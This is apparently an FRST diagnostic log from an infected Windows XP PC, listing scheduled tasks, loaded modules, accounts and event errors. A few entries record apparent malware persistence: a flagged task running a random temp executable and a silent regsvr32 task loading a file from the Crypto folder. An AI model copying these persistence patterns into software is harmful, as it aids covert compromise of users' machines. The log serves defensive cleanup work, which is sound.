    CustomCLSID: HKU\S-1-5-21-515967899-117609710-839522115-1004_Classes\CLSID\{e3e02f12-2adb-478c-8742-5f0819f9f0f4}\InprocServer32 -> C:\Documents and Settings\RAUL_104\Application Data\Move Networks\plugins\npqmp071701000002.dll (Move Networks)
    CustomCLSID: HKU\S-1-5-21-515967899-117609710-839522115-1004_Classes\CLSID\{e473a65c-8087-49a3-affd-c5bc4a10669b}\InprocServer32 -> C:\Documents and Settings\RAUL_104\Application Data\Move Networks\plugins\npqmp071701000002.dll (Move Networks)
    CustomCLSID: HKU\S-1-5-21-515967899-117609710-839522115-1004_Classes\CLSID\{E67BE843-BBBE-4484-95FB-05271AE86750}\localserver32 -> C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Update\1.3.26.9\GoogleUpdateOnDemand.exe (Google Inc.)
    CustomCLSID: HKU\S-1-5-21-515967899-117609710-839522115-1004_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Update\1.3.26.9\psuser.dll (Google Inc.)
    CustomCLSID: HKU\S-1-5-21-515967899-117609710-839522115-1004_Classes\CLSID\{fc345d4c-b8f4-4674-bff7-3c37d2e535ee}\InprocServer32 -> C:\Documents and Settings\RAUL_104\Application Data\Move Networks\plugins\npqmp071701000002.dll (Move Networks)
    CustomCLSID: HKU\S-1-5-21-515967899-117609710-839522115-1004_Classes\CLSID\{fd6484ed-ebe3-4c3d-938a-8238003b41b7}\InprocServer32 -> C:\Documents and Settings\RAUL_104\Application Data\Move Networks\plugins\npqmp071701000002.dll (Move Networks)

    ==================== Restore Points =========================

    28-12-2014 19:03:46 System Checkpoint
    28-12-2014 22:58:01 System Checkpoint
    29-12-2014 23:07:56 System Checkpoint
    30-12-2014 17:07:45 Software Distribution Service 3.0
    31-12-2014 17:08:02 System Checkpoint
    01-01-2015 18:08:00 System Checkpoint
    03-01-2015 05:00:49 Software Distribution Service 3.0
    03-01-2015 23:25:42 Installed MediaImpression
    06-01-2015 17:11:45 Software Distribution Service 3.0
    07-01-2015 18:24:23 System Checkpoint
    08-01-2015 19:13:31 System Checkpoint
    09-01-2015 19:34:12 System Checkpoint
    09-01-2015 23:21:55 Software Distribution Service 3.0
    10-01-2015 23:34:05 System Checkpoint
    12-01-2015 00:33:08 System Checkpoint
    13-01-2015 00:33:56 System Checkpoint
    13-01-2015 20:03:46 Software Distribution Service 3.0
    14-01-2015 20:35:02 System Checkpoint
    14-01-2015 21:26:52 Software Distribution Service 3.0
    15-01-2015 23:49:24 System Checkpoint
    16-01-2015 20:47:36 Restore Operation
    16-01-2015 20:57:03 Restore Operation
    16-01-2015 21:06:16 Restore Operation
    18-01-2015 21:09:57 System Checkpoint
    19-01-2015 21:53:03 System Checkpoint
    23-01-2015 10:03:08 Software Distribution Service 3.0
    27-01-2015 11:12:53 Software Distribution Service 3.0
    11-02-2015 09:46:06 System Checkpoint
    24-02-2015 02:09:59 Installed AVG 2015
    01-03-2015 00:16:23 System Checkpoint
    09-03-2015 11:58:26 Installed AVG 2015
    09-03-2015 12:40:08 Installed AVG 2015
    09-03-2015 12:50:04 Removed AVG 2015
    12-03-2015 12:58:22 System Checkpoint
    19-03-2015 11:04:06 System Checkpoint
    28-03-2015 19:39:52 Installed ID Tool

    ==================== Hosts content: ==========================

    (If needed Hosts: directive could be included in the fixlist to reset Hosts.)

    2012-06-24 15:11 - 2012-06-24 15:44 - 00000734 ____A C:\WINDOWS\system32\Drivers\etc\hosts
    127.0.0.1 localhost

    ==================== Scheduled Tasks (whitelisted) =============

    (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

    Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\system32\Macromed\Flash\FlashPlayerUpdateService.exe
    Task: C:\WINDOWS\Tasks\ConfigExec.job => C:\WINDOWS\system32\rundll32.exeSC:\Program Files\Microsoft Fix it Center\MatsApi.dll
    Task: C:\WINDOWS\Tasks\CryptoUpdate.job => C:\WINDOWS\system32\regsvr32.exe]/s C:\Documents and Settings\RAUL_104\Application Data\Microsoft\Crypto\RSA\cert_v95_0.tpl
    Task: C:\WINDOWS\Tasks\DataUpload.job => C:\WINDOWS\system32\rundll32.exeGC:\Program Files\Microsoft Fix it Center\MatsApi.dll
    Task: C:\WINDOWS\Tasks\dluddia.job => C:\DOCUME~1\RAUL_104\LOCALS~1\Temp\ixnazhk.exe <==== ATTENTION
    Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe
    Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe
    Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-515967899-117609710-839522115-1004Core.job => C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Update\GoogleUpdate.exe
    Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-515967899-117609710-839522115-1004UA.job => C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Update\GoogleUpdate.exe
    Task: C:\WINDOWS\Tasks\Microsoft Windows XP End of Service Notification Logon.job => C:\WINDOWS\system32\xp_eos.exe
    Task: C:\WINDOWS\Tasks\Microsoft Windows XP End of Service Notification Monthly.job => C:\WINDOWS\system32\xp_eos.exe
    Task: C:\WINDOWS\Tasks\MP Scheduled Scan.job => C:\Program Files\Windows Defender\MpCmdRun.exe
    Task: C:\WINDOWS\Tasks\PCDoctorBackgroundMonitorTask.job => C:\Program Files\My Dell\uaclauncher.exeq-backgroundmon scripts\backgroundmon.xml
    Task: C:\WINDOWS\Tasks\SystemToolsDailyTest.job => C:\Program Files\My Dell\uaclauncher.exe

    ==================== Loaded Modules (whitelisted) ==============

    2013-10-14 01:01 - 2013-09-26 17:59 - 00276808 ____N () c:\windows\system32\iherf\shim_xskeqjbwy.dll
    2013-10-14 01:01 - 2013-09-26 17:59 - 00239944 ____N () c:\windows\system32\iherf\mcapp_kmilhiyul.dll
    2013-10-14 01:01 - 2013-09-26 17:59 - 02763080 ____N () c:\windows\system32\iherf\mcsc_fyxinitei.dll
    2010-06-15 21:50 - 2009-11-05 08:39 - 00087552 _____ () C:\WINDOWS\system32\cpwmon2k.dll
    2010-12-16 01:42 - 2009-11-04 09:14 - 00157696 _____ () C:\WINDOWS\System32\spool\PRTPROCS\W32X86\dleadrpp.dll
    2011-09-27 08:23 - 2011-09-27 08:23 - 00087912 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
    2011-09-27 08:22 - 2011-09-27 08:22 - 01242472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
    2010-12-16 01:41 - 2010-01-07 17:09 - 00098984 _____ () C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\dleaserv.exe
    2010-05-14 12:59 - 2010-05-14 12:59 - 00455944 _____ () C:\Program Files\Flip Video\FlipShare\FlipShareService.exe
    2010-05-14 12:38 - 2010-05-14 12:38 - 01581056 _____ () C:\Program Files\Flip Video\FlipShare\QtCore4.dll
    2010-05-14 12:49 - 2010-05-14 12:49 - 02519040 _____ () C:\Program Files\Flip Video\FlipShare\Core.dll
    2010-05-14 12:38 - 2010-05-14 12:38 - 00188416 _____ () C:\Program Files\Flip Video\FlipShare\QtSql4.dll
    2010-05-14 12:38 - 2010-05-14 12:38 - 00356352 _____ () C:\Program Files\Flip Video\FlipShare\QtXml4.dll
    2010-05-14 12:38 - 2010-05-14 12:38 - 06443008 _____ () C:\Program Files\Flip Video\FlipShare\QtGui4.dll
    2010-05-14 12:41 - 2010-05-14 12:41 - 00708608 _____ () C:\Program Files\Flip Video\FlipShare\qca2.dll
    2014-03-28 05:35 - 2014-03-28 05:35 - 00093696 _____ () C:\Program Files\FileZilla FTP Client\fzshellext.dll
    2009-01-10 18:15 - 2009-01-10 18:15 - 00159744 _____ () C:\Program Files\Haali\MatroskaSplitter\mmfinfo.dll
    2009-01-10 18:14 - 2009-01-10 18:14 - 00023552 _____ () C:\Program Files\Haali\MatroskaSplitter\mkunicode.dll
    2009-03-26 14:28 - 2004-04-11 20:57 - 00040960 ____N () C:\Program Files\Dell\Media Experience\DirWatcher.dll
    2009-10-14 14:36 - 2009-10-14 14:36 - 02793304 _____ () C:\Program Files\Logitech\Logitech WebCam Software\LWS.exe
    2010-12-16 01:33 - 2011-01-23 21:22 - 00770728 _____ () C:\Program Files\Dell V310-V510 Series\dleamon.exe
    2010-12-16 01:31 - 2009-11-26 05:49 - 00086180 _____ () C:\Program Files\Dell V310-V510 Series\dleacfg.dll
    2010-12-16 01:33 - 2010-04-01 14:23 - 00389120 _____ () C:\Program Files\Dell V310-V510 Series\dleascw.dll
    2010-12-16 01:40 - 2009-05-27 08:16 - 00192512 _____ () C:\WINDOWS\system32\spool\drivers\w32x86\3\dleadatr.dll
    2010-12-16 01:33 - 2010-04-01 14:24 - 01159168 _____ () C:\Program Files\Dell V310-V510 Series\dleaDRS.dll
    2010-12-16 01:33 - 2009-03-10 02:43 - 00155648 _____ () C:\Program Files\Dell V310-V510 Series\dleacaps.dll
    2010-12-16 01:33 - 2009-03-05 14:55 - 00059904 _____ () C:\Program Files\Dell V310-V510 Series\dleacnv4.dll
    2010-12-16 01:30 - 2009-02-20 04:49 - 00299008 _____ () C:\WINDOWS\system32\dleasm.dll
    2010-12-16 01:30 - 2009-02-20 04:50 - 00028672 _____ () C:\WINDOWS\system32\dleasmr.dll
    2010-12-16 01:33 - 2011-01-23 21:22 - 00139944 _____ () C:\Program Files\Dell V310-V510 Series\ezprint.exe
    2010-12-16 01:33 - 2009-06-22 10:08 - 00708608 _____ () C:\Program Files\Dell V310-V510 Series\Epwizard.DLL
    2010-12-16 01:33 - 2009-06-22 10:06 - 00159744 _____ () C:\Program Files\Dell V310-V510 Series\customui.dll
    2010-12-16 01:33 - 2009-06-22 10:06 - 00114688 _____ () C:\Program Files\Dell V310-V510 Series\Eputil.DLL
    2010-12-16 01:33 - 2009-06-22 10:05 - 00139264 _____ () C:\Program Files\Dell V310-V510 Series\Imagutil.DLL
    2010-12-16 01:33 - 2009-06-22 10:06 - 00061440 _____ () C:\Program Files\Dell V310-V510 Series\Epfunct.DLL
    2010-12-16 01:33 - 2009-06-22 10:08 - 02203648 _____ () C:\Program Files\Dell V310-V510 Series\EPWizRes.dll
    2010-12-16 01:33 - 2009-06-22 10:08 - 00045056 _____ () C:\Program Files\Dell V310-V510 Series\epstring.dll
    2010-12-16 01:33 - 2009-06-22 10:08 - 00196608 _____ () C:\Program Files\Dell V310-V510 Series\EPOEMDll.dll
    2010-12-16 01:33 - 2009-04-07 16:25 - 00409600 _____ () C:\Program Files\Dell V310-V510 Series\iptk.dll
    2010-12-16 01:33 - 2009-03-02 11:25 - 00151552 _____ () C:\Program Files\Dell V310-V510 Series\dleaptp.dll
    2011-03-21 17:10 - 2011-07-28 19:08 - 01259376 _____ () C:\Program Files\DivX\DivX Update\DivXUpdate.exe
    2011-03-21 17:10 - 2011-07-28 19:09 - 00096112 _____ () C:\Program Files\DivX\DivX Update\DivXUpdateCheck.dll
    2004-08-04 06:00 - 2008-04-13 20:11 - 00014336 _____ () C:\WINDOWS\system32\msdmo.dll
    2011-04-26 16:23 - 2011-04-26 16:23 - 00223088 _____ () C:\Program Files\Motorola\MotoHelper\MotoHelperService.exe
    2009-10-14 14:34 - 2009-10-14 14:34 - 00560472 _____ () C:\Program Files\Common Files\Logishrd\LQCVFX\COCIManager.exe
    2011-04-26 16:22 - 2011-04-26 16:22 - 00681840 _____ () C:\Program Files\Motorola\MotoHelper\MotoHelperAgent.exe
    2010-12-16 01:40 - 2009-12-16 07:42 - 00167936 _____ () C:\Program Files\Dell\V310-V510 Series\dleamicro.dll
    2010-12-16 01:40 - 2009-12-16 13:07 - 01159168 _____ () C:\Program Files\Dell\V310-V510 Series\dleadrs.dll
    2010-12-16 01:40 - 2009-11-26 04:49 - 00086180 _____ () C:\Program Files\Dell\V310-V510 Series\dleacfg.dll
    2010-12-16 01:40 - 2009-03-10 01:43 - 00155648 _____ () C:\Program Files\Dell\V310-V510 Series\dleacaps.dll
    2010-12-16 01:40 - 2009-03-05 13:55 - 00059904 _____ () C:\Program Files\Dell\V310-V510 Series\dleacnv4.dll
    2013-10-14 01:02 - 2013-09-26 17:59 - 00239944 ____N () c:\windows\system32\iherf\svcboot_tdcreqqfu.dll
    2013-10-14 01:01 - 2013-09-26 17:58 - 02529608 ____N () c:\windows\system32\iherf\Director_kfxdjwdew.dll
    2013-10-14 01:01 - 2013-09-26 17:59 - 00313672 ____N () c:\windows\system32\iherf\Proxy.dll
    2013-10-14 01:01 - 2013-09-26 17:58 - 00285000 ____N () c:\windows\system32\iherf\dprx_xwnyubbfm.dll
    2013-10-14 01:01 - 2013-09-26 17:58 - 00362824 ____N () c:\windows\system32\iherf\ccp_osiikbkwz.dll
    2013-10-14 01:00 - 2013-09-26 15:13 - 00047616 ____N () c:\windows\system32\iherf\LiteUnzip.dll
    2013-10-14 01:01 - 2013-09-26 17:59 - 00231752 ____N () c:\windows\system32\iherf\mcmsg_krrxdcxgc.dll
    2013-10-14 01:01 - 2013-09-26 17:59 - 00538952 ____N () c:\windows\system32\iherf\mca_cfregooed.dll
    2013-10-14 01:01 - 2013-09-26 17:59 - 00231752 ____N () c:\windows\system32\iherf\mcy_cwlnafqoh.dll
    2013-10-14 01:00 - 2013-09-26 17:59 - 01386824 ____N () c:\windows\system32\iherf\mcsky_cigwikaur.dll
    2013-10-14 01:01 - 2013-09-26 17:59 - 00309576 ____N () c:\windows\system32\iherf\mco_flwchjfak.dll
    2013-10-14 01:01 - 2013-09-26 17:59 - 00313672 ____N () c:\windows\system32\iherf\mcoexp_tqxbfwbqk.dll
    2013-10-14 01:01 - 2013-09-26 17:59 - 00248136 ____N () c:\windows\system32\iherf\mclmd_njudaomov.dll
    2013-10-14 01:01 - 2013-09-26 17:59 - 02812232 ____N () c:\windows\system32\iherf\mck_aicsxezuy.dll
    2013-10-14 01:01 - 2013-09-26 17:59 - 02963784 ____N () c:\windows\system32\iherf\mcie_doxecbadk.dll
    2013-10-14 01:01 - 2013-09-26 17:59 - 00555336 ____N () c:\windows\system32\iherf\mcff_brgbmoikc.dll
    2013-10-14 01:00 - 2013-09-26 17:59 - 03311944 ____N () c:\windows\system32\iherf\mcgc_ghkvkhoxf.dll
    2009-03-26 13:16 - 2005-09-01 05:25 - 00045056 ____N () C:\Program Files\Compact Wireless-G USB Adapter Wireless Network Monitor\Security.dll
    2009-03-26 13:16 - 2002-04-24 01:00 - 00110592 _____ () C:\Program Files\Compact Wireless-G USB Adapter Wireless Network Monitor\GEMWEP.DLL
    2009-03-26 13:16 - 2003-10-13 16:30 - 00094208 _____ () C:\WINDOWS\system32\GTW32N50.dll
    2009-03-26 13:16 - 2004-09-29 16:51 - 00122880 _____ () C:\Program Files\Compact Wireless-G USB Adapter Wireless Network Monitor\ez54g.dll
    2009-03-26 13:16 - 2005-02-24 21:15 - 00102400 _____ () C:\Program Files\Compact Wireless-G USB Adapter Wireless Network Monitor\ses_cl.dll
    2009-04-09 19:04 - 2009-04-09 19:04 - 02141008 _____ () C:\Program Files\Logitech\Vid HD\QtCore4.dll
    2009-03-03 18:17 - 2009-03-03 18:17 - 07704400 _____ () C:\Program Files\Logitech\Vid HD\QtGui4.dll
    2009-04-22 17:53 - 2009-04-22 17:53 - 00969040 _____ () C:\Program Files\Logitech\Vid HD\QtNetwork4.dll
    2009-03-03 18:17 - 2009-03-03 18:17 - 00475472 _____ () C:\Program Files\Logitech\Vid HD\QtOpenGL4.dll
    2009-03-03 18:17 - 2009-03-03 18:17 - 00363856 _____ () C:\Program Files\Logitech\Vid HD\QtXml4.dll
    2009-03-03 18:17 - 2009-03-03 18:17 - 00200016 _____ () C:\Program Files\Logitech\Vid HD\QtSql4.dll
    2010-10-29 16:01 - 2010-10-29 16:01 - 00027472 _____ () C:\Program Files\Logitech\Vid HD\SDL.dll
    2009-03-03 18:17 - 2009-03-03 18:17 - 11311952 _____ () C:\Program Files\Logitech\Vid HD\QtWebKit4.dll
    2009-03-03 18:17 - 2009-03-03 18:17 - 00291664 _____ () C:\Program Files\Logitech\Vid HD\phonon4.dll
    2010-10-29 16:02 - 2010-10-29 16:02 - 00751616 _____ () C:\Program Files\Logitech\Vid HD\vpxmd.dll
    2009-03-03 18:18 - 2009-03-03 18:18 - 00029008 _____ () C:\Program Files\Logitech\Vid HD\plugins\imageformats\qgif4.dll
    2009-03-03 18:18 - 2009-03-03 18:18 - 00035152 _____ () C:\Program Files\Logitech\Vid HD\plugins\imageformats\qico4.dll
    2009-03-03 18:18 - 2009-03-03 18:18 - 00138064 _____ () C:\Program Files\Logitech\Vid HD\plugins\imageformats\qjpeg4.dll
    2004-08-04 06:00 - 2008-04-13 20:11 - 00059904 _____ () C:\WINDOWS\system32\devenum.dll

    ==================== Alternate Data Streams (whitelisted) =========

    (If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

    AlternateDataStreams: C:\WINDOWS:1AD20FA131D5A83D
    AlternateDataStreams: C:\WINDOWS\system32:d99eddf6.zreglib

    ==================== Safe Mode (whitelisted) ===================

    (If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ioloSystemService => ""="Service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ioloSystemService => ""="Service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""=""
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wdf01000.sys => ""="Driver"

    ==================== EXE Association (whitelisted) ===============

    (If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)


    ==================== Other Areas ============================

    (Currently there is no automatic fix for this section.)

    HKU\S-1-5-21-515967899-117609710-839522115-1004\Control Panel\Desktop\\Wallpaper -> C:\Documents and Settings\RAUL_104\Application Data\Microsoft\Internet Explorer\Internet Explorer Wallpaper.bmp
    DNS Servers: 209.18.47.61 - 209.18.47.62

    ==================== MSCONFIG/TASK MANAGER disabled items ==

    (Currently there is no automatic fix for this section.)


    ==================== Accounts: =============================

    Administrator (S-1-5-21-515967899-117609710-839522115-500 - Administrator - Enabled) => %SystemDrive%\Documents and Settings\Administrator
    AMY_106 (S-1-5-21-515967899-117609710-839522115-1006 - Limited - Enabled) => %SystemDrive%\Documents and Settings\AMY_106
    AMY_1061 (S-1-5-21-515967899-117609710-839522115-1009 - Limited - Enabled) => %SystemDrive%\Documents and Settings\AMY_1061
    ASPNET (S-1-5-21-515967899-117609710-839522115-1007 - Limited - Enabled)
    Guest (S-1-5-21-515967899-117609710-839522115-501 - Limited - Enabled) => %SystemDrive%\Documents and Settings\Guest
    HelpAssistant (S-1-5-21-515967899-117609710-839522115-1000 - Limited - Disabled)
    RAUL_104 (S-1-5-21-515967899-117609710-839522115-1004 - Administrator - Enabled) => %SystemDrive%\Documents and Settings\RAUL_104
    RAUL_106 (S-1-5-21-515967899-117609710-839522115-1005 - Limited - Enabled) => %SystemDrive%\Documents and Settings\RAUL_106
    SUPPORT_388945a0 (S-1-5-21-515967899-117609710-839522115-1002 - Limited - Disabled)

    ==================== Faulty Device Manager Devices =============


    ==================== Event log errors: =========================

    Application errors:
    ==================
    Error: (03/28/2015 07:24:36 PM) (Source: MsiInstaller) (EventID: 11706) (User: RAUL-104)
    Description: Product: HP Photo and Imaging 2.2 - Scanjet 3970 Series -- Error 1706.No valid source could be found for product HP Photo and Imaging 2.2 - Scanjet 3970 Series. The Windows Installer cannot continue.

    Error: (03/28/2015 07:22:49 PM) (Source: .NET Runtime 2.0 Error Reporting) (EventID: 5000) (User: )
    Description: EventType clr20r3, P1 kies.exe, P2 1.0.0.893, P3 5073d4b9, P4 kies, P5 1.0.0.893, P6 5073d4b9, P7 2d, P8 0, P9 clr20r30, P10 clr20r31.

    Error: (03/28/2015 07:19:18 PM) (Source: MemeoBackgroundService) (EventID: 0) (User: )
    Description: Problem starting Memeo Background Service :.Config file 'C:\Program Files\WD\WD Anywhere Backup\MemeoBackgroundService.exe.config' cannot be read successfully due to exception 'System.IO.FileNotFoundException: The system cannot find the file specified. (Exception from HRESULT: 0x80070002)
    at System.ConfigServer.RunParser(IConfigHandler factory, String fileName)
    at System.ConfigTreeParser.Parse(String fileName, String configPath, Boolean skipSecurityStuff)
    at System.Runtime.Remoting.Activation.RemotingXmlConfigFileParser.ParseConfigFile(String filename)
    at System.Runtime.Remoting.RemotingConfigHandler.LoadConfigurationFromXmlFile(String filename)'. at System.Runtime.Remoting.RemotingConfigHandler.LoadConfigurationFromXmlFile(String filename)
    at System.Runtime.Remoting.RemotingConfigHandler.DoConfiguration(String filename, Boolean ensureSecurity)
    at System.Runtime.Remoting.RemotingConfiguration.Configure(String filename, Boolean ensureSecurity)
    at RemoteServerService.MemeoBackgroundService.OnStart(String[] args)

    Error: (03/28/2015 07:05:37 PM) (Source: .NET Runtime 2.0 Error Reporting) (EventID: 5000) (User: )
    Description: EventType clr20r3, P1 kies.exe, P2 1.0.0.893, P3 5073d4b9, P4 kies, P5 1.0.0.893, P6 5073d4b9, P7 2d, P8 0, P9 clr20r30, P10 clr20r31.

    Error: (03/28/2015 07:02:17 PM) (Source: MemeoBackgroundService) (EventID: 0) (User: )
    Description: Problem starting Memeo Background Service :.Config file 'C:\Program Files\WD\WD Anywhere Backup\MemeoBackgroundService.exe.config' cannot be read successfully due to exception 'System.IO.FileNotFoundException: The system cannot find the file specified. (Exception from HRESULT: 0x80070002)
    at System.ConfigServer.RunParser(IConfigHandler factory, String fileName)
    at System.ConfigTreeParser.Parse(String fileName, String configPath, Boolean skipSecurityStuff)
    at System.Runtime.Remoting.Activation.RemotingXmlConfigFileParser.ParseConfigFile(String filename)
    at System.Runtime.Remoting.RemotingConfigHandler.LoadConfigurationFromXmlFile(String filename)'. at System.Runtime.Remoting.RemotingConfigHandler.LoadConfigurationFromXmlFile(String filename)
    at System.Runtime.Remoting.RemotingConfigHandler.DoConfiguration(String filename, Boolean ensureSecurity)
    at System.Runtime.Remoting.RemotingConfiguration.Configure(String filename, Boolean ensureSecurity)
    at RemoteServerService.MemeoBackgroundService.OnStart(String[] args)

    Error: (03/28/2015 06:58:14 PM) (Source: .NET Runtime 2.0 Error Reporting) (EventID: 5000) (User: )
    Description: EventType clr20r3, P1 kies.exe, P2 1.0.0.893, P3 5073d4b9, P4 kies, P5 1.0.0.893, P6 5073d4b9, P7 2d, P8 0, P9 clr20r30, P10 clr20r31.

    Error: (03/28/2015 06:54:49 PM) (Source: MemeoBackgroundService) (EventID: 0) (User: )
    Description: Problem starting Memeo Background Service :.Config file 'C:\Program Files\WD\WD Anywhere Backup\MemeoBackgroundService.exe.config' cannot be read successfully due to exception 'System.IO.FileNotFoundException: The system cannot find the file specified. (Exception from HRESULT: 0x80070002)
    at System.ConfigServer.RunParser(IConfigHandler factory, String fileName)
    at System.ConfigTreeParser.Parse(String fileName, String configPath, Boolean skipSecurityStuff)
    at System.Runtime.Remoting.Activation.RemotingXmlConfigFileParser.ParseConfigFile(String filename)
    at System.Runtime.Remoting.RemotingConfigHandler.LoadConfigurationFromXmlFile(String filename)'. at System.Runtime.Remoting.RemotingConfigHandler.LoadConfigurationFromXmlFile(String filename)
    at System.Runtime.Remoting.RemotingConfigHandler.DoConfiguration(String filename, Boolean ensureSecurity)
    at System.Runtime.Remoting.RemotingConfiguration.Configure(String filename, Boolean ensureSecurity)
    at RemoteServerService.MemeoBackgroundService.OnStart(String[] args)

    Error: (03/28/2015 06:52:18 PM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Faulting application plugin-container.exe, version 36.0.4.5557, faulting module mozalloc.dll, version 36.0.4.5557, fault address 0x00001e02.
    Processing media-specific event for [plugin-container.exe!ws!]

    Error: (03/28/2015 04:50:37 PM) (Source: .NET Runtime 2.0 Error Reporting) (EventID: 5000) (User: )
    Description: EventType clr20r3, P1 kies.exe, P2 1.0.0.893, P3 5073d4b9, P4 kies, P5 1.0.0.893, P6 5073d4b9, P7 2d, P8 0, P9 clr20r30, P10 clr20r31.

    Error: (03/28/2015 04:45:30 PM) (Source: MemeoBackgroundService) (EventID: 0) (User: )
    Description: Problem starting Memeo Background Service :.Config file 'C:\Program Files\WD\WD Anywhere Backup\MemeoBackgroundService.exe.config' cannot be read successfully due to exception 'System.IO.FileNotFoundException: The system cannot find the file specified. (Exception from HRESULT: 0x80070002)
    at System.ConfigServer.RunParser(IConfigHandler factory, String fileName)
    at System.ConfigTreeParser.Parse(String fileName, String configPath, Boolean skipSecurityStuff)
    at System.Runtime.Remoting.Activation.RemotingXmlConfigFileParser.ParseConfigFile(String filename)
    at System.Runtime.Remoting.RemotingConfigHandler.LoadConfigurationFromXmlFile(String filename)'. at System.Runtime.Remoting.RemotingConfigHandler.LoadConfigurationFromXmlFile(String filename)
    at System.Runtime.Remoting.RemotingConfigHandler.DoConfiguration(String filename, Boolean ensureSecurity)
    at System.Runtime.Remoting.RemotingConfiguration.Configure(String filename, Boolean ensureSecurity)
    at RemoteServerService.MemeoBackgroundService.OnStart(String[] args)


    System errors:
    =============
    Error: (03/28/2015 07:34:22 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
    Description: The server {73E709EA-5D93-4B2E-BBB0-99B7938DA9E4} did not register with DCOM within the required timeout.

    Error: (03/28/2015 07:32:21 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
    Description: The server {73E709EA-5D93-4B2E-BBB0-99B7938DA9E4} did not register with DCOM within the required timeout.

    Error: (03/28/2015 07:30:10 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
    Description: The server {73E709EA-5D93-4B2E-BBB0-99B7938DA9E4} did not register with DCOM within the required timeout.

    Error: (03/28/2015 07:28:00 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
    Description: The server {73E709EA-5D93-4B2E-BBB0-99B7938DA9E4} did not register with DCOM within the required timeout.

    Error: (03/28/2015 07:25:59 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
    Description: The server {73E709EA-5D93-4B2E-BBB0-99B7938DA9E4} did not register with DCOM within the required timeout.

    Error: (03/28/2015 07:22:32 PM) (Source: Service Control Manager) (EventID: 7022) (User: )
    Description: The McAfee Boot Delay Start Service service hung on starting.

    Error: (03/28/2015 07:13:14 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
    Description: The server {73E709EA-5D93-4B2E-BBB0-99B7938DA9E4} did not register with DCOM within the required timeout.

    Error: (03/28/2015 07:11:36 PM) (Source: Service Control Manager) (EventID: 7032) (User: )
    Description: The Service Control Manager tried to take a corrective action (Restart the service) after the unexpected termination of the McAfee Platform Services service, but this action failed with the following error:
    %%1056

    Error: (03/28/2015 07:11:36 PM) (Source: Service Control Manager) (EventID: 7032) (User: )
    Description: The Service Control Manager tried to take a corrective action (Restart the service) after the unexpected termination of the McAfee VirusScan Announcer service, but this action failed with the following error:
    %%1056

    Error: (03/28/2015 07:11:03 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
    Description: The server {73E709EA-5D93-4B2E-BBB0-99B7938DA9E4} did not register with DCOM within the required timeout.


    Microsoft Office Sessions:
    =========================
    Error: (11/09/2010 10:52:49 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
    Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6545.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 5988 seconds with 360 seconds of active time. This session ended with a crash.


    ==================== Memory info ===========================

    Processor: Intel(R) Pentium(R) 4 CPU 3.00GHz
    Percentage of memory in use: 56%
    Total physical RAM: 2559 MB
    Available physical RAM: 1119.44 MB
    Total Pagefile: 4451.45 MB
    Available Pagefile: 2321.59 MB
    Total Virtual: 2047.88 MB
    Available Virtual: 1893.02 MB

    ==================== Drives ================================

    Drive c: () (Fixed) (Total:931.5 GB) (Free:574.57 GB) NTFS ==>[Drive with boot components (Windows XP)]
    Drive d: (New Volume) (Fixed) (Total:111.72 GB) (Free:111.64 GB) NTFS

    ==================== MBR & Partition Table ==================

    ========================================================
    Disk: 0 (MBR Code: Windows XP) (Size: 931.5 GB) (Disk ID: 88977EAF)
    Partition 1: (Active) - (Size=931.5 GB) - (Type=07 NTFS)

    ========================================================
